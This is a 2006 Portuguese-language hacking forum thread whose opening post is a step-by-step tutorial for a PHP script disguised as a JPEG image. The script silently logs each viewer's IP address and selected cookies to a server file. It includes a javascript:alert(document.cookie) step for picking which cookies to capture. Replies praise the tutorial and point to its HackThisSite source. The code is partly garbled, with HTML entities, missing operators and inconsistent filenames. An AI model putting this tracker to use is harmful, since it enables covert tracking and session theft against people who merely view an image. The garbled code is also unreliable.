Foto que rouba IP e Cookies

Started by Anonymous, 26 de March , 2006, 11:39:26 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Anonymous

aew pessoal esse e o meu 100 post lol! então vou postar mais um tutorial bem explicado pra vocês!!!

Vamos começar do basico não se preucupem vou explicar tudo o maximo que puder

<?php
header
("Content-type&#58; image/jpeg");
$i getenv("REMOTE_ADDR");
$d date(
$intofile $i "@" $d &#46; "<br />" &#46;&#46;&#46;



1 Aqui e a parte aonde começa o PHP (obvio ne...)

2 header("Content-type: image/jpeg");
Define que isso vai ser uma imagens JPEG.

3 $i = getenv("REMOTE_ADDR");
Pega o endereço de IP

4 $d = date(l, F d, H:i:s)
Define o formato da data

5 $t = $i "@" $d . "
" ...
O começo do que você vai por no arquivo de sua escolha. Atenção ainda não coloque o ;

Agora vai uma parte facil que apenas requer um pequeno evento de Javascript.
Vá no site de sua escolha q você esta colocando isso,e nao barra de url digite

javascript:alert(document.cookie)
Escolha os cookies que quizer e coloque na variavel $t,veja um exemplo;

$HTTP_COOKIE_VARS['cookie_numero1'] . "<br />" . $HTTP_COOKIE_VA
RS['cookie_numero2'] . <br />;

Agora e a parte que vamos roubar os cookies.
Lembre-se que o PHP não converte o HEX para você.

Agora o resto sera facil.note que agora eu terminei a variavel $t com ; agora poderemos completar o resto do documento.

Agora adicione isso ao seu arquivo:

$f = fopen("logging.txt", "a");
fwrite($f, $t);
fclose($f);
$bg = imagecreatefromjpeg("background.jpg");
imagejpeg($bg);
imagedestroy($bg);
?>

Isso e facil agora vamos ver a explicação

6 $f = fopen("cookie/ip.txt", "a");
Define em que arquivo ficar seus cookies/IPS.

7 fwrite($f, $t);
Escreve o conteudo da variavel $t no cookie/ip.txt.

8 fclose($f);
Fecha o arquivo $f.

9 $bg = imagecreatefromjpeg("background.jpg");
Define a imagem que você quer.

10 imagejpeg($bg);
Cria a imagen.

11 imagedestroy($bg);
Termina a criação do documento.

12 ?>
Fecha a tag do PHP

Agora coloque o arqivo PHP em algum diretorio o fundo de sua escolha no msm diretorio e a seu cookie/ips.txt com CFMODDED 777,e o .htaccess com ele.

Pronto!


Pra enteder melhor aconselho a verem o video:
http://www.milw0rm.com/video/
XSS

Fonte:
HTS.org

Tradução:
Wolff123

Shady



Mundus Vult Decipi

Anonymous

Valeu pelo centésimo post cara!!

Ele está sem dúvida muito explicativo e ainda com um vídeo.

Sucesso,

H4xn3tw0rk

bloodrain

isso nao devia estar na seçao php?

Anonymous


Shady

Quote from: "bloodrain"isso nao devia estar na seçao php?

E php, mas tambem e uma tecnica hacker ao inves de programacao comum


Mundus Vult Decipi

Anonymous

aeee show de bola cara... mto bom tuto... parabéns

whit3_sh4rk

Outra técnica muito boa, mas novamente, esqueceu de citar a fonte cara:
http://www.hackthissite.org/articles/read/427

[]s

Anonymous